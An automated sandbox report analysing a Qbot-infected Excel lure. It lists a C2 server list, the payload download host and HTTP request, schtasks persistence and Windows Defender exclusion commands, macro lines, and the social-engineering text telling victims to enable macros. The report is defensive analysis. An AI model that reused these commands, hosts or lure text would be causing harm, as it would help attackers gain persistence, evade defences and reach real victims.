Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report CompensationClaim-1033191014-09282021.xls

Overview

General Information

Sample Name:CompensationClaim-1033191014-09282021.xls
Analysis ID:492656
MD5:6c81ae06a5a6b766edca78e79caa44e9
SHA1:62771a1cf905d4346cc5d0a764eaf55e685a61d9
SHA256:b3e63f41617ed5bd3bb77a130be65bbbc500e927e7b21425d3d1fb484a7485bb
Tags:xls
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Qbot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected Qbot
Document exploit detected (drops PE files)
Sigma detected: Schedule system process
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Office process drops PE file
Writes to foreign memory regions
Uses cmd line tools excessively to alter registry or file data
Sigma detected: Microsoft Office Product Spawning Windows Shell
Allocates memory in foreign processes
Injects code into the Windows Explorer (explorer.exe)
Sigma detected: Regsvr32 Command Line Without DLL
Drops PE files to the user root directory
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Yara detected hidden Macro 4.0 in Excel
Uses schtasks.exe or at.exe to add and modify task schedules
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Downloads executable code via HTTP
Drops files with a non-matching file extension (content does not match file extension)
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Uses a known web browser user agent for HTTP communication
Uses reg.exe to modify the Windows registry
Document contains embedded VBA macros
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2752 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • regsvr32.exe (PID: 3048 cmdline: regsvr32 -silent ..\Drezd.red MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2960 cmdline: -silent ..\Drezd.red MD5: 432BE6CF7311062633459EEF6B242FB5)
        • explorer.exe (PID: 2980 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
          • schtasks.exe (PID: 2932 cmdline: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn pajjxwey /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 22:10 /ET 22:22 MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
    • regsvr32.exe (PID: 2920 cmdline: regsvr32 -silent ..\Drezd1.red MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2976 cmdline: regsvr32 -silent ..\Drezd2.red MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • regsvr32.exe (PID: 672 cmdline: regsvr32.exe -s 'C:\Users\user\Drezd.red' MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 408 cmdline: -s 'C:\Users\user\Drezd.red' MD5: 432BE6CF7311062633459EEF6B242FB5)
      • explorer.exe (PID: 2136 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
        • reg.exe (PID: 2132 cmdline: C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Ciwuywu' /d '0' MD5: 9D0B3066FE3D1FD345E86BC7BCCED9E4)
        • reg.exe (PID: 2680 cmdline: C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Uvelq' /d '0' MD5: 9D0B3066FE3D1FD345E86BC7BCCED9E4)
  • regsvr32.exe (PID: 2116 cmdline: regsvr32.exe -s 'C:\Users\user\Drezd.red' MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2848 cmdline: -s 'C:\Users\user\Drezd.red' MD5: 432BE6CF7311062633459EEF6B242FB5)
  • cleanup

Malware Configuration

Threatname: Qbot

{"Bot id": "obama105", "Campaign": "1632819007", "Version": "402.343", "C2 list": ["120.150.218.241:995", "95.77.223.148:443", "185.250.148.74:443", "181.118.183.94:443", "105.198.236.99:443", "140.82.49.12:443", "37.210.152.224:995", "89.101.97.139:443", "81.241.252.59:2078", "27.223.92.142:995", "81.250.153.227:2222", "73.151.236.31:443", "47.22.148.6:443", "122.11.220.212:2222", "120.151.47.189:443", "199.27.127.129:443", "216.201.162.158:443", "136.232.34.70:443", "76.25.142.196:443", "75.66.88.33:443", "45.46.53.140:2222", "173.25.166.81:443", "103.148.120.144:443", "173.21.10.71:2222", "186.18.205.199:995", "71.74.12.34:443", "67.165.206.193:993", "47.40.196.233:2222", "68.204.7.158:443", "47.40.196.233:2222", "24.229.150.54:995", "109.12.111.14:443", "177.130.82.197:2222", "72.252.201.69:443", "24.55.112.61:443", "24.139.72.117:443", "187.156.138.172:443", "71.80.168.245:443", "196.217.156.63:995", "82.77.137.101:995", "173.234.155.233:443", "75.188.35.168:443", "5.238.149.235:61202", "73.77.87.137:443", "182.176.112.182:443", "96.37.113.36:993", "162.244.227.34:443", "92.59.35.196:2222", "196.218.227.241:995", "68.207.102.78:443", "2.188.27.77:443", "189.210.115.207:443", "181.163.96.53:443", "75.107.26.196:465", "185.250.148.74:2222", "68.186.192.69:443"]}

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
CompensationClaim-1033191014-09282021.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000006.00000002.617600278.0000000010001000.00000040.00020000.sdmpJoeSecurity_Qbot_1Yara detected QbotJoe Security
      00000006.00000002.615656945.00000000003D0000.00000004.00000001.sdmpJoeSecurity_Qbot_1Yara detected QbotJoe Security
        0000000D.00000002.634139082.0000000010001000.00000040.00020000.sdmpJoeSecurity_Qbot_1Yara detected QbotJoe Security
          00000007.00000002.881366079.0000000000080000.00000040.00020000.sdmpJoeSecurity_Qbot_1Yara detected QbotJoe Security
            0000000E.00000002.881374188.00000000000C0000.00000040.00020000.sdmpJoeSecurity_Qbot_1Yara detected QbotJoe Security
              Click to see the 1 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              6.2.regsvr32.exe.3d0000.0.raw.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
                7.2.explorer.exe.80000.0.raw.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
                  13.2.regsvr32.exe.2a0000.0.raw.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
                    13.2.regsvr32.exe.2a0000.0.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
                      14.2.explorer.exe.c0000.0.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
                        Click to see the 1 entries

                        Sigma Overview

                        System Summary:

                        barindex
                        Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
                        Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 -silent ..\Drezd.red, CommandLine: regsvr32 -silent ..\Drezd.red, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2752, ProcessCommandLine: regsvr32 -silent ..\Drezd.red, ProcessId: 3048
                        Sigma detected: Regsvr32 Command Line Without DLLShow sources
                        Source: Process startedAuthor: Florian Roth: Data: Command: -silent ..\Drezd.red, CommandLine: -silent ..\Drezd.red, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: regsvr32 -silent ..\Drezd.red, ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 3048, ProcessCommandLine: -silent ..\Drezd.red, ProcessId: 2960

                        Persistence and Installation Behavior:

                        barindex
                        Sigma detected: Schedule system processShow sources
                        Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn pajjxwey /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 22:10 /ET 22:22, CommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn pajjxwey /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 22:10 /ET 22:22, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\SysWOW64\explorer.exe, ParentImage: C:\Windows\SysWOW64\explorer.exe, ParentProcessId: 2980, ProcessCommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn pajjxwey /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 22:10 /ET 22:22, ProcessId: 2932

                        Jbx Signature Overview

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection:

                        barindex
                        Found malware configurationShow sources
                        Source: 14.2.explorer.exe.c0000.0.unpackMalware Configuration Extractor: Qbot {"Bot id": "obama105", "Campaign": "1632819007", "Version": "402.343", "C2 list": ["120.150.218.241:995", "95.77.223.148:443", "185.250.148.74:443", "181.118.183.94:443", "105.198.236.99:443", "140.82.49.12:443", "37.210.152.224:995", "89.101.97.139:443", "81.241.252.59:2078", "27.223.92.142:995", "81.250.153.227:2222", "73.151.236.31:443", "47.22.148.6:443", "122.11.220.212:2222", "120.151.47.189:443", "199.27.127.129:443", "216.201.162.158:443", "136.232.34.70:443", "76.25.142.196:443", "75.66.88.33:443", "45.46.53.140:2222", "173.25.166.81:443", "103.148.120.144:443", "173.21.10.71:2222", "186.18.205.199:995", "71.74.12.34:443", "67.165.206.193:993", "47.40.196.233:2222", "68.204.7.158:443", "47.40.196.233:2222", "24.229.150.54:995", "109.12.111.14:443", "177.130.82.197:2222", "72.252.201.69:443", "24.55.112.61:443", "24.139.72.117:443", "187.156.138.172:443", "71.80.168.245:443", "196.217.156.63:995", "82.77.137.101:995", "173.234.155.233:443", "75.188.35.168:443", "5.238.149.235:61202", "73.77.87.137:443", "182.176.112.182:443", "96.37.113.36:993", "162.244.227.34:443", "92.59.35.196:2222", "196.218.227.241:995", "68.207.102.78:443", "2.188.27.77:443", "189.210.115.207:443", "181.163.96.53:443", "75.107.26.196:465", "185.250.148.74:2222", "68.186.192.69:443"]}
                        Multi AV Scanner detection for dropped fileShow sources
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.9218096065[1].datReversingLabs: Detection: 15%
                        Source: 13.2.regsvr32.exe.1310000.7.unpackAvira: Label: TR/Crypt.XPACK.Gen2
                        Source: 6.2.regsvr32.exe.2a80000.7.unpackAvira: Label: TR/Crypt.XPACK.Gen2
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                        Source: Binary string: amstream.pdb source: explorer.exe, 00000007.00000003.618389279.00000000026B0000.00000004.00000040.sdmp, explorer.exe, 0000000E.00000003.634893726.0000000001350000.00000004.00000040.sdmp
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_1000AEB4 FindFirstFileW,FindNextFileW,
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0008AEB4 FindFirstFileW,FindNextFileW,
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_1000AEB4 FindFirstFileW,FindNextFileW,
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_000CAEB4 FindFirstFileW,FindNextFileW,

                        Software Vulnerabilities:

                        barindex
                        Document exploit detected (drops PE files)Show sources
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: 44467.9218096065[1].dat.0.drJump to dropped file
                        Document exploit detected (process start blacklist hit)Show sources
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
                        Document exploit detected (UrlDownloadToFile)Show sources
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.14.37.187:80
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.14.37.187:80
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 28 Sep 2021 20:07:48 GMTContent-Type: application/octet-streamContent-Length: 259072Connection: keep-aliveX-Powered-By: PHP/5.4.16Accept-Ranges: bytesExpires: 0Cache-Control: no-cache, no-store, must-revalidateContent-Disposition: attachment; filename="44467.9218096065.dat"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 85 8c 3b 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 03 01 00 16 03 00 00 da 00 00 00 00 00 00 00 10 00 00 00 10 00 00 00 30 03 00 00 00 00 10 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 27 06 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 30 03 00 70 00 00 00 f4 60 27 06 7c 01 00 00 00 70 27 06 d8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 27 06 f4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 6a 14 03 00 00 10 00 00 00 16 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 65 64 61 74 61 00 00 70 00 00 00 00 30 03 00 00 02 00 00 00 1a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 10 00 00 00 40 03 00 00 60 00 00 00 1c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 61 74 61 00 00 00 30 06 24 06 00 50 03 00 00 68 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 74 00 6e 07 00 00 00 60 27 06 00 08 00 00 00 e4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d8 07 00 00 00 70 27 06 00 08 00 00 00 ec 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                        Source: global trafficHTTP traffic detected: GET /44467.9218096065.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.14.37.187Connection: Keep-Alive
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.187
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.187
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.187
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.187
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.187
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.187
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.187
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.187
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.187
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.187
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.187
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.187
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.187
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.187
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.187
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.187
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.187
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.187
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.187
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.187
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.187
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.187
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.187
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.187
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.187
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.187
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.187
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.187
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.187
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.187
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.187
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.187
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.187
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.187
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.187
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.187
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.187
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.187
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.187
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.187
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.187
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.187
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.187
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.187
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.187
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.187
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.187
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.187
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.187
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.187
                        Source: regsvr32.exe, 00000006.00000002.616250434.00000000024B0000.00000002.00020000.sdmp, explorer.exe, 00000007.00000002.881681374.0000000002040000.00000002.00020000.sdmp, regsvr32.exe, 0000000D.00000002.633036346.0000000000F20000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                        Source: regsvr32.exe, 00000005.00000002.619032737.0000000001D10000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.615803827.0000000001FA0000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.619851177.0000000001CD0000.00000002.00020000.sdmp, regsvr32.exe, 0000000A.00000002.620572592.0000000001D10000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.635427701.0000000000910000.00000002.00020000.sdmp, regsvr32.exe, 0000000D.00000002.632565051.00000000009E0000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
                        Source: regsvr32.exe, 00000006.00000002.616250434.00000000024B0000.00000002.00020000.sdmp, explorer.exe, 00000007.00000002.881681374.0000000002040000.00000002.00020000.sdmp, regsvr32.exe, 0000000D.00000002.633036346.0000000000F20000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000002.881594655.0000000000E00000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.9218096065[1].datJump to behavior
                        Source: global trafficHTTP traffic detected: GET /44467.9218096065.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.14.37.187Connection: Keep-Alive

                        System Summary:

                        barindex
                        Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
                        Source: Screenshot number: 4Screenshot OCR: Enable editing" 20 from the yellow bar above. 21 example of notification 22 23 ( 0 PROTECTH)WARN
                        Source: Screenshot number: 4Screenshot OCR: Enable Content" to perform Miscrosoft Excel Decryption Core to start the 27 decryption of the docum
                        Source: Screenshot number: 4Screenshot OCR: Enable Macros ) 32 33 :: Why I can not open th"s document? 36 37 - You are using iOS or Android
                        Source: Document image extraction number: 0Screenshot OCR: Enable editing" from the yellow bar above. example of notification ( 0 ~ECTHWARNING This file ori
                        Source: Document image extraction number: 0Screenshot OCR: Enable Content" to perform Miscrosoft Excel Decryption Core to start the decryption of the document
                        Source: Document image extraction number: 0Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us
                        Source: Document image extraction number: 1Screenshot OCR: Enable editing" from the yellow bar above. example of notification ( 0 PROTECTH)WARNNG Thisfileor
                        Source: Document image extraction number: 1Screenshot OCR: Enable Content" to perform Miscrosoft Excel Decryption Core to start the decryption of the document
                        Source: Document image extraction number: 1Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us
                        Office process drops PE fileShow sources
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.9218096065[1].datJump to dropped file
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Drezd.red
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_10016EB0
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_10012346
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_10011758
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_10014FC0
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_00096EB0
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_00092346
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_00091758
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_00094FC0
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_10016EB0
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_10012346
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_10011758
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_10014FC0
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_000D6EB0
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_000D2346
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_000D1758
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_000D4FC0
                        Source: CompensationClaim-1033191014-09282021.xlsOLE, VBA macro line: Sub auto_open()
                        Source: CompensationClaim-1033191014-09282021.xlsOLE, VBA macro line: Sub auto_close()
                        Source: CompensationClaim-1033191014-09282021.xlsOLE, VBA macro line: Private m_openAlreadyRan As Boolean
                        Source: CompensationClaim-1033191014-09282021.xlsOLE, VBA macro line: Private Sub saWorkbook_Opensa()
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_1000C6C0 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose,
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_1000CB77 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary,
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_1000C6C0 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose,
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_1000CB77 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary,
                        Source: Drezd.red.14.drStatic PE information: No import functions for PE file found
                        Source: Drezd.red.7.drStatic PE information: No import functions for PE file found
                        Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Ciwuywu' /d '0'
                        Source: CompensationClaim-1033191014-09282021.xlsOLE indicator, VBA macros: true
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and write
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and write
                        Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76F90000 page execute and read and write
                        Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76E90000 page execute and read and write
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and write
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and write
                        Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76F90000 page execute and read and write
                        Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76E90000 page execute and read and write
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and write
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and write
                        Source: C:\Windows\System32\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                        Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ....................<............&9.....(.P.............|.......l.......2.......................................................................
